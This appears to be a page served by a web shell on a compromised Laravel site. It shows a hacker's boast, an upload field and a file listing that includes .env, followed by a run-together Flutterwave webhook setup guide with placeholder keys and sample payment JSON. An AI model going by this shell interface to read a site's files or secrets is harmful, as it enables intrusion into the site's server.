I am a hacker in the dark of a very cold night

path :/var/www/html/vorne.webheaydemo.com

upload file:

List of files:

name file size edit permission action
.editorconfig276 KBMarch 05 2024 07:12:340666
.env1385 KBMay 24 2024 16:43:550666
.env.example1088 KBMarch 05 2024 07:12:340666
.gitattributes190 KBMarch 05 2024 07:12:340666
.gitignore245 KBMarch 05 2024 07:12:340666
.htaccess947 KBJuly 04 2023 21:25:080664
.rnd1024 KBMarch 13 2024 04:51:140666
README.md472 KBMarch 22 2024 10:35:000666
app-March 05 2024 07:12:340777
artisan1739 KBMarch 05 2024 07:12:340666
bootstrap-March 05 2024 07:12:340777
composer.json2829 KBMay 13 2024 12:10:040666
composer.lock417205 KBMarch 19 2024 12:13:140666
config-July 03 2025 02:53:360777
database-March 05 2024 07:12:340777
index.php1816 KBMay 13 2024 10:32:360666
lang-May 13 2024 14:53:260777
manifest.json913 KBMay 14 2024 03:57:260664
package.json398 KBMarch 05 2024 07:12:340666
phpunit.xml1206 KBMarch 05 2024 07:12:340666
public-July 03 2025 02:37:200777
resources-May 13 2024 12:09:360777
routes-March 05 2024 07:12:340777
service-worker.js924 KBMarch 05 2024 07:12:340666
storage-March 05 2024 10:03:520777
symlink.php218 KBMarch 05 2024 07:12:340666
tests-March 05 2024 07:12:340777
vendor-March 19 2024 12:13:140777
vite.config.js326 KBMarch 05 2024 07:12:340666
# Webhooks Click [here](https://developer.flutterwave.com/reference#webhook) to learn more about webhooks For every transaction, Flutterwave will send a post request of the transaction to you, follow these steps to set it up ## 1. Setup your webhook routes ```php Route::post('/webhook/flutterwave', [FlutterwaveController::class, 'webhook'])->name('webhook'); ``` ## 2. Add your webhook secret hash to your `.env` ```bash FLW_PUBLIC_KEY=FLWPUBK-xxxxxxxxxxxxxxxxxxxxx-X FLW_SECRET_KEY=FLWSECK-xxxxxxxxxxxxxxxxxxxxx-X FLW_SECRET_HASH='MY_POTTY_PATTY' ``` ## 3. Setup the webhook in your Flutterwave Dashboard

Login to you Flutterwave dashboard then click on settings , on the setting page navigate to webhooks to add a webhook.

Once on the webhook page, click the input text to add your webhook url and your secret hash and use the save action button to save it.

## 4. Grant CSRF Access to Flutterwave Webhook Go to `app/Http/Middleware/VerifyCsrfToken.php` and add your webhook url to the `$except` array ```php protected $except = [ '/webhook/flutterwave', ]; ``` ### 4. Setup your Controller > Setup your controller to handle the routes. I created the `FlutterwaveController`. Use the `Flutterwave` > facade. ```php event == 'charge.completed' && $request->data->status == 'successful') { $verificationData = Flutterwave::verifyPayment($request->data['id']); if ($verificationData['status'] === 'success') { // process for successful charge } } // if it is a transfer event, verify and confirm it is a successful transfer if ($verified && $request->event == 'transfer.completed') { $transfer = Flutterwave::transfers()->fetch($request->data['id']); if($transfer['data']['status'] === 'SUCCESSFUL') { // update transfer status to successful in your db } else if ($transfer['data']['status'] === 'FAILED') { // update transfer status to failed in your db // revert customer balance back } else if ($transfer['data']['status'] === 'PENDING') { // update transfer status to pending in your db } } } } ``` ## Webhook Samples ### Successful Payment ```json { "event": "charge.completed", "data": { "id": 285959875, "tx_ref": "Links-616626414629", "flw_ref": "PeterEkene/FLW270177170", "device_fingerprint": "a42937f4a73ce8bb8b8df14e63a2df31", "amount": 100, "currency": "NGN", "charged_amount": 100, "app_fee": 1.4, "merchant_fee": 0, "processor_response": "Approved by Financial Institution", "auth_model": "PIN", "ip": "197.210.64.96", "narration": "CARD Transaction ", "status": "successful", "payment_type": "card", "created_at": "2020-07-06T19:17:04.000Z", "account_id": 17321, "customer": { "id": 215604089, "name": "Yemi Desola", "phone_number": null, "email": "user@gmail.com", "created_at": "2020-07-06T19:17:04.000Z" }, "card": { "first_6digits": "123456", "last_4digits": "7889", "issuer": "VERVE FIRST CITY MONUMENT BANK PLC", "country": "NG", "type": "VERVE", "expiry": "02/23" } } } ``` ### Successful Transfers ```json { "event": "transfer.completed", "event.type": "Transfer", "data": { "id": 33286, "account_number": "0690000033", "bank_name": "ACCESS BANK NIGERIA", "bank_code": "044", "fullname": "Bale Gary", "created_at": "2020-04-14T16:39:17.000Z", "currency": "NGN", "debit_currency": "NGN", "amount": 30020, "fee": 26.875, "status": "SUCCESSFUL", "reference": "a0a827b1eca65311_PMCKDU_5", "meta": null, "narration": "lolololo", "approver": null, "complete_message": "Successful", "requires_approval": 0, "is_approved": 1 } } ``` ## Best practices If your webhook script performs complex logic, or makes network calls, it's possible that the script would time out before Flutterwave sees its complete execution. For that reason, you might want to have your webhook endpoint immediately acknowledge receipt by returning a 2xx HTTP status code, and then perform the rest of its duties. Webhook endpoints might occasionally receive the same event more than once. We advise you to guard against duplicated event receipts by making your event processing [idempotent](https://en.wikipedia.org/wiki/Idempotence). One way I do this is making the reference unique, so once it has hit the server more than once, it won't record for subsequent events